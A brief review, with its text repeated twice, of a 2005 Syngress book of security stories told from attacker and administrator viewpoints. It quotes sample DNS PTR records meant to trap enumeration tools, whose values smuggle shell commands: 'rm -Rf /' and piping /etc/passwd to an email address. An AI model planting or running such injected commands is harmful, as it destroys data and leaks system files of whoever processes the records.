Syngress 2005
This book contains eight exciting stories with a very good technical background. Each case is described from two points of view, the attacker and the administrator.
For example: Defense against dns enumeration: place funny dns-entries like:
252.11.64.178.in-addr.arpa 86400 IN PTR rm -Rf /;
252.11.64.178.in-addr.arpa 86400 IN PTR | rm -Rf /
253.11.64.178.in-addr.arpa 86400 IN PTR ;cat /etc/passwd |
mail [email protected]
This book contains eight exciting stories with a very good technical background. Each case is described from two points of view, the attacker and the administrator.
For example: Defense against dns enumeration: place funny dns-entries like:
252.11.64.178.in-addr.arpa 86400 IN PTR rm -Rf /;
252.11.64.178.in-addr.arpa 86400 IN PTR | rm -Rf /
253.11.64.178.in-addr.arpa 86400 IN PTR ;cat /etc/passwd |
mail [email protected]
Comment